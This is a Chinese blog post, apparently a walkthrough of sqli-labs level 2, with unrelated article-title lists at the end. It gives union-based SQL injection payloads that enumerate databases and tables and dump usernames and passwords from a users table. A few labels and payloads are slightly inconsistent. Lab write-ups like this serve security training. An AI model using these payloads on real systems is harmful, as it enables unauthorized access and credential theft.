less2

and 1=1有回显，and 1=2无回显，为数值型注入

order by 4–+报错，有3行

查询数据库名

?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

查询列名

?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

查询账号密码

?id=0 union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+

这里因为跟第一关大同小异，字段类型都是一样的，可以直接用exp去爆

exp：?id=-1 union SELECT 1,2,(select group_concat(username,0x3a,password) from users)--+

这里解释一下0x3a的用途：把账号和密码整合到一起更直观的显示

最新文章

1. 动画黄金搭档:CADisplayLink & CAShapeLayer
2. ssh authentication魔鬼细节--.ssh文件夹权限
3. list用法详解
4. POJ3169 Layout(差分约束系统)
5. Bucket Sort
6. Codeforces#348DIV2/VK CUP 2016
7. DeepLearning.ai学习笔记（一）神经网络和深度学习--Week4深层神经网络
8. Java多线程——中断机制
9. Python爬虫与数据分析之爬虫技能：urlib库、xpath选择器、正则表达式
10. keepalived给LVS带来了什么
11. RunLoop 原理和核心机制
12. python 迭代器模式
13. 禁用win7更新
14. HR 常用事务代码
15. C和指针第七章第五题
16. java switch
17. ACM-线段树扫描线总结
18. NOIP2003 神经网络（bfs）
19. Linux网络编程——tcp并发服务器（poll实现）
20. TortoiseGit 连接oschina不用每次输入username和password的方法

热门文章

1. Spring配置声明式事务
2. 如何用 js 实现一个 apply 函数
3. ES6 & import * & import default & import JSON
4. 开始 nx
5. js字典
6. Masterboxan INC ：个股出现疯涨，投资者需警惕股市泡沫
7. css整理之-----------布局相关
8. Github Packages和Github Actions实践之CI/CD
9. 修改vs模板抬头\Common7\IDE\ItemTemplates\CSharp\Code\2052\Class
10. The last packet successfully received from the server was 49,061,696 millise